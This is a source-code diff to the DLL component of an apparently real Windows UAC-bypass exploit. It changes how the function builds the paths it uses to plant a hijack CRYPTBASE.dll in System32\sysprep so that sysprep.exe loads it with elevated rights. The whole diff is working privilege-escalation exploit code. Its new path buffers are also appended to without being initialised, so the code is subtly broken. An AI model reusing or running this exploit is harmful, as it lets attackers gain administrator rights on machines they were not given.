Update source

external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp

@@ -2,13 +2,17 @@
 
 void exploit()
 {
-	const wchar_t  *szElevDir = L"C:\\Windows\\System32\\sysprep";
-	const wchar_t  *szElevDll = L"CRYPTBASE.dll";
-	const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll";
-	const wchar_t  *szSourceDll = L"CRYPTBASE.dll"; // Need some IPC to randomize this if possible
-	const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe";
+
+	const wchar_t *szSysPrepDir = L"\\System32\\sysprep\\";
+	const wchar_t *sySysPrepExe = L"sysprep.exe";
+	const wchar_t *szElevDll = L"CRYPTBASE.dll";
+	const wchar_t *szSourceDll = L"CRYPTBASE.dll";
+	wchar_t szElevDir[MAX_PATH];
+	wchar_t szElevDllFull[MAX_PATH];
+	wchar_t szElevExeFull[MAX_PATH];
+	wchar_t path[MAX_PATH];
+	wchar_t windir[MAX_PATH];
 	const wchar_t *szElevArgs = L"";
-	wchar_t  path[MAX_PATH];
 	const wchar_t  *szEIFOMoniker = NULL;
 	PVOID OldValue = NULL;
 
@@ -21,9 +25,24 @@ void exploit()
 	const IID     *pIID_EIFOClass = &__uuidof(FileOperation);
 	const IID     *pIID_ShellItem2 = &__uuidof(IShellItem2);
 
+	
+	GetWindowsDirectoryW(windir, MAX_PATH);
 	GetTempPathW(MAX_PATH, path);
-	wcscat_s(path, MAX_PATH, szSourceDll);
 
+	/* %temp%\cryptbase.dll */
+	wcscat_s(path, MAX_PATH, szSourceDll);
+	
+	/* %windir%\System32\sysprep\ */
+	wcscat_s(szElevDir, MAX_PATH, windir);
+	wcscat_s(szElevDir, MAX_PATH, szSysPrepDir);
+
+	/* %windir\system32\sysprep\cryptbase.dll */
+	wcscat_s(szElevDllFull, MAX_PATH, szElevDir);
+	wcscat_s(szElevDllFull, MAX_PATH, szElevDll);
+
+	/* %windir%\system32\sysprep\sysprep.exe */
+	wcscat_s(szElevExeFull, MAX_PATH, szElevDir);
+	wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe);
 
 	if (CoInitialize(NULL) == S_OK)
 	{